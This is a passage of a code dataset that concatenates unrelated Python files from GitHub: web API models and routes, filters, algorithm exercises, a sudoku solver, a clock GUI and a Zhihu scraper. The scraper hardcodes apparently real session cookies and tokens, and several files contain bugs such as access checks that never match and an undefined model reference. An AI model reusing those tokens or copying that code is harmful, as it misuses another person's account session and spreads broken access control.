app.run(debug=True)\n","repo_name":"darkhorrow/emergency-services-app","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43522234584","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(120), unique=True, nullable=False)\n password = db.Column(db.String(80), unique=False, nullable=False)\n is_active = db.Column(db.Boolean(), unique=False, nullable=False)\n\n def __repr__(self):\n return '' % self.username\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"email\": self.email,\n # do not serialize the password, its a security breach\n }\n\nContact_Group_link = db.Table(\"links\",\n db.Column(\"id_contact\", db.Integer, db.ForeignKey(\"Contact.id\"), primary_key=True),\n db.Column(\"id_group\", db.Integer, db.ForeignKey(\"Group.id\"), primary_key=True)\n)\n\nclass Contact(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n full_name = db.Column(db.String(80), nullable=False)\n email = db.Column(db.String(80), nullable=False)\n address = db.Column(db.String(80))\n phone = db.Column(db.String(80))\n\n \n\n\n\n\n\nclass Group(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), nullable=False)\n contacts = db.relationship(\"Contact\", secondary=\"links\", lazy='subquery', backref = db.backref(\"groups\", lazy=True))\n","repo_name":"OmarElFakih/flask-contact-list-api","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"516034440","text":"from django.db.models import Q\nfrom django_filters import rest_framework as filters\n\nfrom accounts.models import InstructorProfile, StudentProfile\nfrom education.models import (\n Assignment,\n Course,\n Event,\n EventType,\n Grade,\n NonPeriodicEventDetails,\n PeriodicEventDetails,\n Solution,\n StudentGroup,\n Timetable,\n)\n\n\nclass CourseFilter(filters.FilterSet):\n instructors = filters.ModelMultipleChoiceFilter(\n label='Instructors',\n field_name='uuid',\n to_field_name='uuid',\n queryset=InstructorProfile.objects.all(),\n )\n\n student_groups = filters.ModelMultipleChoiceFilter(\n label='Student Groups',\n field_name='uuid',\n to_field_name='uuid',\n queryset=StudentGroup.objects.all(),\n )\n\n class Meta:\n model = Course\n fields = ('code', 'title', 'instructors', 'student_groups',)\n\n @property\n def qs(self):\n parent = super().qs\n user = getattr(self.request, 'user', None)\n\n if hasattr(user, 'user.studentprofile'):\n return parent.filter(student_groups__in=user.studentprofile.student_groups)\n if hasattr(user, 'user.instructorprofile'):\n return parent.filter(instructors=user.instructorprofile)\n return parent\n\n\nclass TimetableFilter(filters.FilterSet):\n course = filters.ModelChoiceFilter(\n label='Course',\n field_name='uuid',\n to_field_name='uuid',\n queryset=Course.objects.all(),\n )\n\n class Meta:\n model = Timetable\n fields = (\n 'code', 'title', 'course', 'course__code', 'course__title',\n 'start_date', 'end_date',\n )\n\n @property\n def qs(self):\n parent = super().qs\n user = getattr(self.request, 'user', None)\n\n if hasattr(user, 'user.studentprofile'):\n return parent.filter(course__student_groups__in=user.studentprofile.student_groups)\n if hasattr(user, 'user.instructorprofile'):\n return parent.filter(course__instructors=user.instructorprofile)\n return parent\n\n\nclass TimetableItemFilter(filters.FilterSet):\n timetable = filters.ModelChoiceFilter(\n label='Timetable',\n field_name='uuid',\n to_field_name='uuid',\n queryset=Timetable.objects.all(),\n )\n\n instructor = filters.ModelChoiceFilter(\n label='Instructor',\n field_name='uuid',\n to_field_name='uuid',\n queryset=InstructorProfile.objects.all(),\n )\n\n students = filters.ModelMultipleChoiceFilter(\n label='Students',\n field_name='uuid',\n to_field_name='uuid',\n queryset=StudentProfile.objects.all(),\n )\n\n class Meta:\n abstract = True\n fields = (\n 'title', 'timetable', 'instructor', 'students', 'start_time',\n 'end_time',\n )\n\n @property\n def qs(self):\n parent = super().qs\n user = getattr(self.request, 'user', None)\n\n if hasattr(user, 'user.studentprofile'):\n return parent.filter(students=user.studentprofile)\n if hasattr(user, 'user.instructorprofile'):\n return parent.filter(instructors=user.instructorprofile)\n return parent\n\n\nclass PeriodicTimetableItemFilter(TimetableItemFilter):\n class Meta:\n abstract = True\n fields = TimetableItemFilter.Meta.fields + ('weekday', 'repeat_type',)\n\n\nclass NonPeriodicTimetableItemFilter(TimetableItemFilter):\n class Meta:\n abstract = True\n fields = TimetableItemFilter.Meta.fields + ('date',)\n\n\nclass AssignmentFilter(NonPeriodicTimetableItemFilter):\n class Meta:\n model = Assignment\n fields = NonPeriodicTimetableItemFilter.Meta.fields + ()\n\n\nclass SolutionFilter(filters.FilterSet):\n assignment = filters.ModelChoiceFilter(\n label='Assignment',\n field_name='uuid',\n to_field_name='uuid',\n queryset=Assignment.objects.all(),\n )\n\n student = filters.ModelChoiceFilter(\n label='Student',\n field_name='uuid',\n to_field_name='uuid',\n queryset=StudentProfile.objects.all(),\n )\n\n class Meta:\n model = Solution\n fields = ('assignment', 'student', 'created_at',)\n\n @property\n def qs(self):\n parent = super().qs\n user = getattr(self.request, 'user', None)\n\n if hasattr(user, 'user.studentprofile'):\n return parent.filter(student=user.studentprofile)\n if hasattr(user, 'user.instructorprofile'):\n return parent.filter(assignment__instructor=user.instructorprofile)\n return parent\n\n\nclass GradeFilter(filters.FilterSet):\n solution = filters.ModelChoiceFilter(\n label='Solution',\n field_name='uuid',\n to_field_name='uuid',\n queryset=Solution.objects.all(),\n )\n\n instructor = filters.ModelChoiceFilter(\n label='Instructor',\n field_name='uuid',\n to_field_name='uuid',\n queryset=InstructorProfile.objects.all(),\n )\n\n class Meta:\n model = Grade\n fields = ('value', 'solution', 'instructor', 'created_at',)\n\n @property\n def qs(self):\n parent = super().qs\n user = getattr(self.request, 'user', None)\n\n if hasattr(user, 'user.studentprofile'):\n return parent.filter(solution__student=user.studentprofile)\n if hasattr(user, 'user.instructorprofile'):\n return parent.filter(instructor=user.instructorprofile)\n return parent\n\n\nclass EventFilter(filters.FilterSet):\n event_type = filters.ModelChoiceFilter(\n label='Event Type',\n field_name='uuid',\n to_field_name='uuid',\n queryset=EventType.objects.all(),\n )\n\n timetable = filters.ModelChoiceFilter(\n label='Timetable',\n field_name='uuid',\n to_field_name='uuid',\n queryset=Timetable.objects.all(),\n )\n\n @property\n def qs(self):\n parent = super().qs\n user = getattr(self.request, 'user', None)\n\n if hasattr(user, 'user.studentprofile'):\n return parent.filter(timetable__course__student_groups__in=user.studentprofile.student_groups)\n if hasattr(user, 'user.instructorprofile'):\n return parent.filter(timetable__course__instructors=user.instructorprofile)\n\n return parent\n\n class Meta:\n model = Event\n fields = (\n 'title', 'event_type', 'event_type__title', 'timetable',\n 'timetable__code',\n )\n","repo_name":"relidaar/lms-api","sub_path":"api/education/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":6470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20278834822","text":"'''\n 路由层\n\n'''\nfrom flask import request\nfrom flask_restx import Namespace, Resource\nfrom Test_pingtai.case_table.log_util import logger\nfrom Test_pingtai.server import api, db\nfrom Test_pingtai.service.testcasse_service import Testcase\n\ncase_ns = Namespace(\"case\", description=\"用例管理\")\n\n\n@case_ns.route(\"/\")\nclass TestCaseServer(Resource):\n\n get_parser = api.parser()\n get_parser.add_argument(\"case_id\", type=int, location=\"args\")\n '''\n 查找,\n '''\n @case_ns.expect(get_parser)\n def get(self):\n logger.info(f\"request header {request.headers}\")\n logger.info(\"get method\")\n logger.info(f\"request args:{request.args}\")\n case_id = request.args.get(\"case_id\")\n\n #调用service层的具体业务逻辑\n testcase = Testcase()\n datas = testcase.get(case_id)\n #响应内容\n return datas\n\n\n\n \"\"\"\n 这是在定义界面上输入的内容\n \"\"\"\n api_parser = api.parser()\n api_parser.add_argument(\"case_id\", type=int, required=True, location=\"json\")\n api_parser.add_argument(\"case_title\", type=str, required=True, location=\"json\")\n api_parser.add_argument(\"remark\", type=str, location=\"json\")\n\n\n '''\n 新增方法-post\n '''\n @case_ns.expect(api_parser)\n def post(self):\n # 输出日志信息\n logger.info(\"post method\")\n logger.info(f\"request params:{request.json}\")\n\n # 获取请求头中的json数据\n case_data = request.json\n case_id = case_data.get(\"case_id\")\n case_title = case_data.get(\"case_title\")\n remark = case_data.get(\"remark\")\n testcase = Testcase()\n datas = testcase.post(case_id=case_id,case_title=case_title,remark=remark)\n if datas:\n return {\"code\": 200, \"message\": \"添加成功\"}\n else:\n return {\"code\": 401, \"message\": \"ID已存在\"}\n\n\n\n update_parser = api.parser()\n update_parser.add_argument(\"case_id\", type=int, required=True, location=\"json\")\n update_parser.add_argument(\"case_title\", type=str, required=True, location=\"json\")\n update_parser.add_argument(\"remark\", type=str, location=\"json\")\n\n\n \"\"\"\n 修改方法\n \"\"\"\n @case_ns.expect(update_parser)\n def put(self):\n logger.info(\"put method\")\n # 获取请求头中的json数据\n case_data = request.json\n logger.info(f\"request params:{request.json}\")\n testcase = Testcase()\n exits = testcase.put(case_data)\n if exits:\n return {\"code\": 200, \"message\": f\"{case_data.get('case_id')} success change\"}\n else:\n return {\"code\": 4002, \"message\": \"id not found\"}\n\n\n\n\n delete_parser = api.parser()\n delete_parser.add_argument(\"case_id\", type=int, required=True, location=\"json\")\n '''\n 删除方法 \n '''\n\n @case_ns.expect(delete_parser)\n def delete(self):\n logger.info(\"delete method\")\n logger.info(f\"reuqest params:{request.json}\")\n\n # 获取请求头中的json数据\n case_data = request.json\n # 获取json中id值\n case_id = case_data.get(\"case_id\")\n\n if case_id:\n TestCase.query.filter_by(case_id=case_id).delete()\n\n # 提交数据库中\n db.session.commit()\n db.session.close()\n return {\"code\": 200, \"message\": \"delete success\"}\n else:\n\n return {\"code\": 402, \"message\": \"case 不存在\"}\n","repo_name":"tascdy-lyz/test_platform","sub_path":"router/testcase.py","file_name":"testcase.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42209729692","text":"from sys import stdin\ninput = stdin.readline\n\n\ndef get_next(x, y):\n if y == M-1:\n return x+1, 0\n return x, y+1\n\n\ndef get_prev(x, y):\n if y == 0:\n return x-1, M-1\n return x, y-1\n\n\nN, M = map(int, input().split(\" \"))\n\narr = [[0]*M for _ in range(N)]\nsum_arr = [[0]*M for _ in range(N)]\nfor i in range(N):\n arr[i] = list(map(int, input().split(\" \")))\n for j in range(M):\n if i == 0 and j == 0:\n sum_arr[i][j] = arr[i][j]\n continue\n\n prev_coord = get_prev(i, j)\n sum_arr[i][j] = sum_arr[prev_coord[0]][prev_coord[1]] + arr[i][j]\n\nK = int(input())\nfor _ in range(K):\n # (i, j) ~ (x, y) 닫힌 구간의 합\n i, j, x, y = [d-1 for d in map(int, input().split(\" \"))]\n if i == 0 and j == 0:\n print(sum_arr[x][y])\n elif i == x and j == y :\n print(arr[i][j])\n else:\n result = (sum_arr[x][y] - sum_arr[x][get_prev(x, j)[1]]) + (sum_arr[i][y] - sum_arr[i][get_prev(i, j)[1]])\n print(result)\n\n\n","repo_name":"ssoso27/Smoothie2","sub_path":"pythAlgo/baekjoon/sum_of_2_dimen_array.py","file_name":"sum_of_2_dimen_array.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70123296747","text":"# import pygame\n# from color import Color\n\n\nclass Grid:\n ROWS: int = 9\n COLS: int = 9\n COLS_PER_BOX: int = COLS // 3\n ROWS_PER_BOX: int = ROWS // 3\n SENTINEL: int = 0\n VALUES: tuple[int, ...] = (1, 2, 3, 4, 5, 6, 7, 8, 9)\n\n\n def __init__(self, grid: list[list[int]]=[]) -> None:\n self.grid: list[list[int]] = [[Grid.SENTINEL] * Grid.COLS for _ in range(Grid.ROWS)]\n self.pencil_grid: list[list[set[int]]] = [[set() for _ in range(Grid.COLS)] for _ in range(Grid.ROWS)]\n self._rowValues: list[set[int]] = [set() for _ in range(Grid.ROWS)]\n self._colValues: list[set[int]] = [set() for _ in range(Grid.COLS)]\n self._boxValues: list[set[int]] = [set() for _ in range(Grid.COLS)]\n if grid:\n self._initialiseBoard(grid)\n\n\n def __repr__(self) -> str:\n result: list[str] = []\n for row in range(Grid.ROWS):\n if row > 0 and row % 3 == 0:\n # 1 2 3 | 4 5 6 | 7 8 9\n result.append(\"---------+---------+---------\")\n # 1 2 3 | 4 5 6 | 7 8 9\n resultRow = []\n for col in range(Grid.COLS):\n if col > 0 and col % 3 == 0:\n resultRow.append(\"|\")\n if self.grid[row][col] == 0:\n resultRow.append(\" \")\n else:\n resultRow.append(f\" {self.grid[row][col]} \")\n result.append(\"\".join(resultRow))\n return \"\\n\".join(result)\n\n\n def _initialiseBoard(self, grid: list[list[int]]) -> None:\n assert len(grid) == Grid.ROWS, \"incorrect number of rows in input\"\n for row in grid:\n assert len(row) == Grid.COLS, \"incorrect number of columns in input\"\n \n for row in range(Grid.ROWS):\n for col in range(Grid.COLS):\n value: int = grid[row][col]\n self.grid[row][col] = value\n if not value:\n continue\n # isInRow[row] is a set containing all the values in that row\n \n # checking if the board being created is actually valid before creating it\n boxNum: int = Grid.getBoxNum(row, col)\n assert (value not in self._rowValues[row] | \n self._colValues[col] | \n self._boxValues[boxNum]), \"unsolvable board created\"\n \n self.setGridValue(row, col, value)\n\n\n def _getNextEmptyCellCoordinates(self) -> tuple[int, int] | None:\n for row in range(Grid.ROWS):\n for col in range(Grid.COLS):\n if self.grid[row][col] == 0:\n return (row, col)\n return None\n\n @staticmethod\n def getBoxNum(row: int, col: int) -> int:\n return (row // 3) * 3 + (col // 3)\n\n\n def isValidAssignment(self, row: int, col: int, value: int) -> bool:\n boxNum = Grid.getBoxNum(row, col)\n return (row in range(Grid.ROWS) and col in range(Grid.COLS) and \n value in range(1, len(Grid.VALUES) + 1) and\n value not in (self._rowValues[row] | self._colValues[col] |\n self._boxValues[boxNum]))\n\n\n def _resetGridValue(self, row: int, col: int) -> None:\n value: int = self.grid[row][col]\n \n if value == Grid.SENTINEL:\n # if the value was already null then return\n return\n \n # removing the value from the grid\n self.grid[row][col] = Grid.SENTINEL\n \n # removing the value from the \n boxNum: int = Grid.getBoxNum(row, col)\n self._rowValues[row].discard(value)\n self._colValues[col].discard(value)\n self._boxValues[boxNum].discard(value)\n\n\n def setGridValue(self, row: int, col: int, value: int) -> None:\n assert self.isValidAssignment(row, col, value), \"invalid assignment\"\n \n self.grid[row][col] = value\n boxNum: int = Grid.getBoxNum(row, col)\n self._rowValues[row].add(value)\n self._colValues[col].add(value)\n self._boxValues[boxNum].add(value)\n\n\n def updatePencilValue(self, row: int, col: int, value: int) -> None:\n assert (row in range(Grid.ROWS) and col in range(Grid.COLS) and\n value in range(1, len(Grid.VALUES) + 1)), \"invalid assignment\"\n \n if value in self.pencil_grid[row][col]:\n # if this number was already present then remove it from the set\n self.pencil_grid[row][col].remove(value)\n else:\n # if this number was not present then add it to the set\n self.pencil_grid[row][col].add(value)\n\n\n def resetPencilValue(self, row: int, col: int) -> None:\n assert (row in range(Grid.ROWS) and col in range(Grid.COLS)), \"invalid coordinates\"\n self.pencil_grid[row][col].clear()\n\n\n def solve(self) -> bool:\n nextEmptyCell: tuple[int, int] | None = self._getNextEmptyCellCoordinates()\n if not nextEmptyCell:\n # if all cells have been filled and no empty cells then solving is complete\n return True\n \n # if there is an empty cell then unpack it\n row, col = nextEmptyCell\n \n for value in Grid.VALUES:\n # loop through all the possible values\n if not self.isValidAssignment(row, col, value):\n continue\n \n # if we can assing a value to this empty cell then assign it\n self.setGridValue(row, col, value)\n \n # now check for the remaining board\n if self.solve():\n return True\n \n # if the rest of the board was not solvable then undo this assignment\n self._resetGridValue(row, col)\n \n # if none of the values worked out then \n return False\n","repo_name":"Garth-brick/sudoku","sub_path":"grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34425439978","text":"# link : https://leetcode.com/problems/count-zero-request-servers/description/\n# author : Mohamed Ibrahim\nclass Solution:\n def countServers(self, n: int, logs: List[List[int]], x: int, queries: List[int]) -> List[int]:\n res, cnt = [0] * len(queries), Counter()\n i, j, used = 0, 0, 0\n logs.sort(key=lambda l : l[1])\n for [t, id] in sorted([t, id] for id, t in enumerate(queries)):\n while i < len(logs) and logs[i][1] <= t:\n cnt[logs[i][0]] += 1\n used += cnt[logs[i][0]] == 1\n i += 1\n while j < i and logs[j][1] < t - x:\n cnt[logs[j][0]] -= 1\n used -= cnt[logs[j][0]] == 0\n j += 1\n res[id] = n - used\n return res\n","repo_name":"M0hamedIbrahim1/-Data-Structure-Algorithms","sub_path":"Two Pointers/Problems/2747. Count Zero Request Servers.py","file_name":"2747. Count Zero Request Servers.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"23863319001","text":"# Sentence1: William I have to deliver practice 3 on 1st of July from 3:15 pm to 5 pm\n# Sentence2: William I have to deliver practice 3 on 2nd of July at 3:15 pm\n# Sentence3: on 3rd of july, William, I have to go to my parents house at half past four pm.\n\n#from asr import recording_voice, split_parts, Get_Event_Elements\nimport asr\n#from create_event import init_credentials, new_event\nimport create_event as ce\n\ndef main():\n # call scripts\n approved = False\n while not approved:\n string = asr.recording_voice()\n print(\"Is that what you said? (Y/n)\")\n if ('Y' or 'y') in input():\n approved = True\n \n eventContent, date, hour = asr.split_parts(string)\n \n summary, start_time, end_time = asr.Get_Event_Elements(eventContent, date, hour)\n\n #print(\"Summary:\",summary,\"\\n\")\n #print(\"Start time:\", start_time,\"\\n\")\n #print(\"End time:\",end_time,\"\\n\")\n\n ce.init_credentials()\n ce.new_event(start_time, summary, end_time)\n\n return True\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"EduardVergesFranch/AST_FinalProject_Baldi_Marti_Bausa_Cesc_Verges_Eduard","sub_path":"calendar_main.py","file_name":"calendar_main.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37124470302","text":"#Function to Find the longest Substring which has non repeating characters\n\ndef findLongestSub(s):\n left = 0\n right = 0\n m = {}\n length = len(s)\n answer = 0\n while left < length and right < length:\n element = s[right]\n if element in m:\n left = max(left, m[element])\n m[element] = right\n answer = max(answer, right - left+1)\n right = right + 1 \n return answer\n\ns = 'ababdhksoia'\n\nlen_sub = findLongestSub(s)\n\nif len_sub == -1:\n print('There was error with the code')\nelse:\n print('The length of longest substring is {}'.format(len_sub))","repo_name":"droidy12527/AlgorithmsInPythonandCpp","sub_path":"longestsubstringwithnorepeatingchars.py","file_name":"longestsubstringwithnorepeatingchars.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13031474546","text":"import math\nimport tkinter as tk\nimport time\n\nmy_w = tk.Tk()\n#my_w.tk.call('tk', 'scaling',200)\nwidth,height=410,410 # set the variables \nc_width,c_height=width-5,height-5 # canvas width height\nd=str(width)+\"x\"+str(height)\nmy_w.geometry(d) \nc1 = tk.Canvas(my_w, width=c_width, height=c_height,bg='lightgreen')\nc1.grid(row=0,column=0,padx=5,pady=5,columnspan=3)\ndial=c1.create_oval(10, 10, 400, 400,width=10,outline='#FF0000',fill='#FFFFFF')\nx,y=205,205 # center \nx1,y1,x2,y2=x,y,x,10 # second needle \ncenter=c1.create_oval(x-8,y-8,x+8,y+8,fill='#c0c0c0')\nr1=180 # dial lines for one minute \nr2=130 # for hour numbers before the lines \nin_degree = 0\nh=iter(['12','1','2','3','4','5','6','7','8','9','10','11'])\nfor i in range(0,60):\n in_radian = math.radians(in_degree) # converting to radian\n if(i%5==0): \n ratio=0.85 # Long marks ( lines )\n t1=x+r2*math.sin(in_radian) # coordinate to add text ( hour numbers )\n t2=x-r2*math.cos(in_radian) # coordinate to add text ( hour numbers )\n c1.create_text(t1,t2,fill='blue',font=\"Times 30 bold\",text=next(h)) # number added\n else:\n ratio=0.9 # small marks ( lines )\n \n x1=x+ratio*r1*math.sin(in_radian)\n y1=y-ratio*r1*math.cos(in_radian)\n x2=x+r1*math.sin(in_radian)\n y2=y-r1*math.cos(in_radian)\n c1.create_line(x1,y1,x2,y2,width=1) # draw the line for segment\n in_degree=in_degree+6 # increment for next segment\n\nmy_w.mainloop()","repo_name":"Wakorithegreat/inspire-in-stem","sub_path":"classes/analog.py","file_name":"analog.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6771341611","text":"import requests\nfrom requests.cookies import RequestsCookieJar\nfrom bs4 import BeautifulSoup\nfrom PIL import Image \nimport base64\nfrom time import sleep\nimport time\nimport hmac\nfrom hashlib import sha1\nimport json\nimport re\n\ndef simulate_login():\n session=requests.session()\n headers={\n 'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0',\n }\n session.headers.update(headers)\n picture=None\n signature=None\n picture_url=None\n\n message=session.get(url='https://www.zhihu.com/api/v3/oauth/captcha?lang=en').json() \n print(message)\n if message['show_captcha'] == False:\n picture=''\n else:\n picture_url = session.put(url='https://www.zhihu.com/api/v3/oauth/captcha?lang=en').json()\n # 采用base64格式将验证码通过图片格式显示出来\n with open('captcha.jpg','wb') as f:\n f.write(base64.b64decode(picture_url['img_base64']))\n image=Image.open('captcha.jpg')\n image.show()\n picture=input('请输入验证码')\n sleep(2)\n message1=session.post(url='https://www.zhihu.com/api/v3/oauth/captcha?lang=en',data={'input_text':picture}).json() # post 验证码\n print(message1)\n\n a=hmac.new('d1b964811afb40118a12068ff74a12f4'.encode('utf-8'),digestmod=sha1)\n a.update('qaz7417417474741'.encode('utf-8'))\n a.update(b'c3cef7c66a1843f8b3a9e6a1e3160e20')\n a.update(b'com.zhihu.web')\n a.update(str(int(time.time()*1000)).encode())\n signature=a.hexdigest()\n\n data={\n 'client_id':'c3cef7c66a1843f8b3a9e6a1e3160e20',#'c3cef7c66a1843f8b3a9e6a1e3160e20',\n 'grant_type':'password',\n 'timestamp':str(int(time.time()*1000)),\n 'source':'com.zhihu.web',\n 'signature':signature,\n 'username':'xxxxxx@sina.com',\n 'password':'xxxxxxx',\n 'captcha':picture,\n 'lang':'en'\n }\n\n headers = {\n 'content-type':'application/x-www-form-urlencoded',\n 'x-zse-83':'3_2.0',\n }\n message=session.post(url='https://www.zhihu.com/api/v3/oauth/sign_in', headers=headers, data=data)\n message.encoding='utf-8'\n print(message.text)\n print(json.loads(message.text)['error']['message'])\n hot_page = session.get('https://www.zhihu.com/hot', headers=headers)\n return hot_page\n\n\nheaders = {\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'user-agent': ': Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36',\n 'cookie': '_zap=775904c7-650c-49cc-a58e-16f0801e92d5; d_c0=\"AFDu7XwQWBCPTljIztnS-_L2AyijmBAJj10=|1573567809\"; _xsrf=gr8hNhot8mvpKAYl2nOGxxxBSLluiZd6; Hm_lvt_98beee57fd2ef70ccdd5ca52b9740c49=1573026345,1573482896,1573537949,1573567912; capsion_ticket=\"2|1:0|10:1573570033|14:capsion_ticket|44:MjIzOWNjODM5MzBiNGIwYjg4MGY3NDc2NGFkOTk5ZTk=|4d7696b5a11b756bb78450c1b678b7ed04ffb85c2de46f0f95670d4f9f13d3ef\"; z_c0=\"2|1:0|10:1573570047|4:z_c0|92:Mi4xMXIzMkFRQUFBQUFBVU83dGZCQllFQ1lBQUFCZ0FsVk5feE80WGdCbnh0WGp5RXVpRXpoVzJuUldoQjIxUjZwQzZn|ad171eab66492267ef55551ebb067a7580d494083ee984729ef04285b8f93606\"; tgw_l7_route=116a747939468d99065d12a386ab1c5f; Hm_lpvt_98beee57fd2ef70ccdd5ca52b9740c49=1573610499; tst=h; tshl='\n}\ncookie_jar = RequestsCookieJar()\ncookie_jar.set(\"z_c0\", \"2|1:0|10:1573570047|4:z_c0|92:Mi4xMXIzMkFRQUFBQUFBVU83dGZCQllFQ1lBQUFCZ0FsVk5feE80WGdCbnh0WGp5RXVpRXpoVzJuUldoQjIxUjZwQzZn|ad171eab66492267ef55551ebb067a7580d494083ee984729ef04285b8f93606:FG=1\")\ndef use_cookies():\n hot_page = requests.get('https://www.zhihu.com/hot', headers=headers, cookies=cookie_jar)\n return hot_page\n \nget_answer_url = 'https://www.zhihu.com/api/v4/questions/{}/answers?include=data%5B%2A%5D.is_normal%2Cadmin_closed_comment%2Creward_info%2Cis_collapsed%2Cannotation_action%2Cannotation_detail%2Ccollapse_reason%2Cis_sticky%2Ccollapsed_by%2Csuggest_edit%2Ccomment_count%2Ccan_comment%2Ccontent%2Ceditable_content%2Cvoteup_count%2Creshipment_settings%2Ccomment_permission%2Ccreated_time%2Cupdated_time%2Creview_info%2Crelevant_info%2Cquestion%2Cexcerpt%2Crelationship.is_authorized%2Cis_author%2Cvoting%2Cis_thanked%2Cis_nothelp%2Cis_labeled%2Cis_recognized%2Cpaid_info%2Cpaid_info_content%3Bdata%5B%2A%5D.mark_infos%5B%2A%5D.url%3Bdata%5B%2A%5D.author.follower_count%2Cbadge%5B%2A%5D.topics&limit=5&offset={}&platform=desktop&sort_by=default'\n\nhot_page = use_cookies()\nhot_html = BeautifulSoup(hot_page.text, 'html.parser')\nhot_items = hot_html.find_all('section', 'HotItem')\nfor i, hot_item in enumerate(hot_items):\n question_url = hot_item.a['href']\n hot_name = hot_item.a['title']\n if not re.match(r'https://www.zhihu.com/question/(.*)', question_url):\n continue\n question_id = re.match(r'https://www.zhihu.com/question/(.*)', question_url).groups()[0]\n \n question_page = requests.get(question_url, headers=headers, cookies=cookie_jar)\n question_html = BeautifulSoup(question_page.text, 'html.parser')\n\n answers = []\n for offset in range(0, 46, 5):\n answer_res = requests.get(get_answer_url.format(question_id, offset), headers=headers)\n answers.extend(json.loads(answer_res.text)['data'])\n sleep(3)\n with open('zhihu_data/'+str(i)+'.json', 'w', encoding='utf-8') as file:\n file.write(json.dumps({'title': hot_name, 'answers': answers}, ensure_ascii=False))","repo_name":"APTX-4869-MDZZ/e-commerce-PJ","sub_path":"Crawler/zhihuCrawler.py","file_name":"zhihuCrawler.py","file_ext":"py","file_size_in_byte":5270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73572151786","text":"from ._eda_distribution import (\n cat_feature_report, num_feature_report, na_bar_plot, target_distribution_plot)\nfrom ._eda_datashift import area_plot, ridge_plot\n\n\ndef unsupported_calplot(*args, **kwargs):\n raise ImportError('Не установлен calplot. Нажми `pip install calplot`))')\n\n\ntry:\n import calplot\n have_calplot = True\nexcept ImportError:\n have_calplot = False\n\nif have_calplot:\n from ._eda_datashift import na_datashift\nelse:\n na_datashift = unsupported_calplot\n\n__all__ = [\n # distribution\n 'cat_feature_report',\n 'num_feature_report',\n 'na_bar_plot',\n 'target_distribution_plot',\n # data_shift\n 'area_plot',\n 'na_datashift',\n 'ridge_plot',\n]\n","repo_name":"mikhailmartin/my_ds_tools","sub_path":"eda/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6018249116","text":"todo_list=[]\n\ndef display_menu():\n print(\"Simple Todo list\")\n print(\"1- Display The TODO list\")\n print(\"2- Add items to TODO list\")\n print(\"3- Mark item as complete\")\n print(\"4- Mark item as incomplete\")\n print(\"5- Delete item\")\n print(\"6- Exit the Programme\")\n \ndef display_list():\n \n for item in todo_list:\n task_number=1\n task_name=item[0]\n task_status=item[1]\n print(f\"{task_number} | {task_name} | {task_status}\")\n task_number+=1\n\ndef add_item(task):\n todo_list.append(task)\n \ndef change_task_status(task_number,task_status):\n task=todo_list[task_number-1]\n completed_task=(task[0],task_status)\n todo_list[task_number-1]=completed_task\n \n \n\nwhile True:\n display_menu()\n choice=int(input(\"Please enter your choice :\"))\n if choice==1:\n display_list()\n elif choice==2:\n item_name=input(\"Enter the Task name :\")\n is_complete=False\n task=(item_name, is_complete)\n add_item(task)\n elif choice==3:\n task_number=int(input(\"Enter the task number to complete :\"))\n change_task_status(task_number,True)\n elif choice==4:\n task_number=int(input(\"Enter the task number to incomplete :\"))\n change_task_status(task_number,False)\n \n \n \n \n \n \n \n ","repo_name":"Ayodhya-98/Python-To-do-list","sub_path":"todoapp.py","file_name":"todoapp.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21066340548","text":"# sys for argument acceptance, math for operations\nimport sys\nimport math\n\n# Globals\n# earth radius in meters (6.37 million)\nr_earth = 6370000\n# speed of light in m/s\nc_speed = 299792458\n# constant in meters per second, squared\ngrav_const = 9.80665\n\n\ndef printOutput(alt, iter, time_total, vel_total, inc_count):\n print(\"Altitude: \", alt, \"m | \", \"Iterator: \", iter, \" m\")\n print(\"Time (hrs): \", round((time_total / 3600), 2), \" hrs\")\n print(\"Time total: \", round(time_total, 2), \" s\")\n print(\"Final velocity: \", round(vel_total, 3), \" m/s | \", round((vel_total / 